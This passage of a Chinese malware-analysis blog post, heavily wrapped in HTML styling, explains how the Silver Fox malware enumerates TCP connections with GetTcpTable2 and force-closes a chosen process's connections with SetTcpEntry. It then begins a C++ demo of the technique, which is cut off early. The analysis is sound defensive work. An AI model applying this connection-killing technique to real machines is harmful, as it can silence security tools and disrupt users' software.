style="mso-spacerun:yes;"><span leaf="">     </span></span><span leaf="">PMIB_TCPTABLE2 TcpTable,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">  </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">in, out</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> PULONG</span><span style="mso-spacerun:yes;"><span leaf="">         </span></span><span leaf="">SizePointer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">  </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">in</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">      </span></span><span leaf="">BOOL</span><span style="mso-spacerun:yes;"><span leaf="">           </span></span><span leaf="">Order</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">参数说明：</span></span></span></p><p style="mso-list:l1 level1 lfo1;margin-left:36.0pt;text-indent:-18.0pt;"><span style="font-family:Symbol;mso-ascii-font-family:Symbol;mso-fareast-font-family:Aptos;mso-bidi-font-family:Symbol;font-variant:normal;text-transform:none;"><span leaf="">·</span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style=""><span leaf="">TcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">: 指向 MIB_TCPTABLE2 结构体的指针，保存返回的 TCP 表。</span></span></span></p><p style="mso-list:l1 level1 lfo1;margin-left:36.0pt;text-indent:-18.0pt;"><span style="font-family:Symbol;mso-ascii-font-family:Symbol;mso-fareast-font-family:Aptos;mso-bidi-font-family:Symbol;font-variant:normal;text-transform:none;"><span leaf="">·</span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style=""><span leaf="">SizePointer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">: 输入/输出参数，表示缓冲区大小（以字节为单位）。如果缓冲区不够，函数会返回 ERROR_INSUFFICIENT_BUFFER 并通过该参数返回所需大小。</span></span></span></p><p style="mso-list:l1 level1 lfo1;margin-left:36.0pt;text-indent:-18.0pt;"><span style="font-family:Symbol;mso-ascii-font-family:Symbol;mso-fareast-font-family:Aptos;mso-bidi-font-family:Symbol;font-variant:normal;text-transform:none;"><span leaf="">·</span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style=""><span leaf="">Order</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">: 是否按照连接的本地地址升序排列。</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">SetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">函数 </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-size:12.0pt;font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;text-underline:none;text-decoration:none;"><span leaf=""><a href="https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-settcpentry" target="_blank">https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-settcpentry</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">SetTcpEntry 用于修改一个现有的 TCP 连接的状态，比如强制关闭连接（改为 DELETE_TCB 状态）。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">原型如下：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">IPHLPAPI_DLL_LINKAGE DWORD SetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">  </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">in</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> PMIB_TCPROW pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">参数说明：</span></span></span></p><p style="mso-list:l1 level1 lfo1;margin-left:36.0pt;text-indent:-18.0pt;"><span style="font-family:Symbol;mso-ascii-font-family:Symbol;mso-fareast-font-family:Aptos;mso-bidi-font-family:Symbol;font-variant:normal;text-transform:none;"><span leaf="">·</span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style=""><span leaf="">pTcpRow:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""> 指向 MIB_TCPROW 的指针，用于指定要更改的 TCP 条目。.</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">通过这两个Api的描述我们就不难猜出银狐是通过获取所有的TCP连接列表，然后筛选特定进程的连接强行关闭，这样就可以 精确地断开某个特定程序所建立的所有网络连接，而不影响其他程序。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">实现如下逻辑：</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">获取某进程的所有 TCP 连接 → 找出其 PID → 遍历连接 → 强制关闭连接。</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们可以简单实现一个Demo验证一下猜想：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ImportTok&#39;;color: #008000;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><windows.h></windows.h></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;iphlpapi.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;ws2_32.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;Psapi.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetPidsByProcessName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">const</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wstring</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> processName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE snapshot </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 